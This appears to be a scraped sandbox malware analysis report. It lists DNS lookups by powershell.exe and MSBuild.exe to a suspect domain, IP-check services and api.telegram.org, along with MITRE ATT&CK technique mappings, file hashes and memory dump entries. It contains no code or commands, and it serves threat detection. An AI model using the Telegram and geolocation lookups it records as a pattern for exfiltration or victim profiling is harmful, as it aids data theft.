powershell.exe

68 B
84 B
1
1

DNS Request

talentrecruitments.com

DNS Response

67.23.254.14
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

checkip.dyndns.org

dns

MSBuild.exe

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

193.122.130.0

132.226.247.73

158.101.44.242

132.226.8.169

193.122.6.168
8.8.8.8:53

reallyfreegeoip.org

dns

MSBuild.exe

65 B
177 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

104.21.16.1

104.21.80.1

104.21.112.1

104.21.32.1

104.21.64.1

104.21.48.1

104.21.96.1
8.8.8.8:53

api.telegram.org

dns

MSBuild.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

c.pki.goog

dns

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.179.227

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3rj2jsfp.mmh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1252-16-0x00007FFC3A650000-0x00007FFC3B111000-memory.dmp

Filesize
10.8MB

Download
memory/1252-20-0x00007FFC3A650000-0x00007FFC3B111000-memory.dmp

Filesize
10.8MB

Download
memory/1252-11-0x00007FFC3A650000-0x00007FFC3B111000-memory.dmp

Filesize
10.8MB

Download
memory/1252-12-0x00007FFC3A650000-0x00007FFC3B111000-memory.dmp

Filesize
10.8MB

Download
memory/1252-13-0x0000025CD6080000-0x0000025CD623E000-memory.dmp

Filesize
1.7MB

Download
memory/1252-14-0x0000025CBD930000-0x0000025CBD93C000-memory.dmp

Filesize
48KB

Download
memory/1252-15-0x00007FFC3A653000-0x00007FFC3A655000-memory.dmp

Filesize
8KB

Download
memory/1252-0-0x00007FFC3A653000-0x00007FFC3A655000-memory.dmp

Filesize
8KB

Download
memory/1252-1-0x0000025CBD950000-0x0000025CBD972000-memory.dmp

Filesize
136KB

Download
memory/4804-21-0x0000000005A40000-0x0000000005FE4000-memory.dmp

Filesize
5.6MB

Download
memory/4804-17-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/4804-22-0x0000000005530000-0x00000000055CC000-memory.dmp

Filesize
624KB

Download
memory/4804-23-0x0000000006980000-0x0000000006B42000-memory.dmp

Filesize
1.8MB

Download
memory/4804-24-0x0000000006820000-0x0000000006870000-memory.dmp

Filesize
320KB

Download
memory/4804-25-0x0000000007180000-0x00000000076AC000-memory.dmp

Filesize
5.2MB

Download
memory/4804-26-0x0000000006CF0000-0x0000000006D82000-memory.dmp

Filesize
584KB

Download
memory/4804-27-0x0000000006CA0000-0x0000000006CAA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response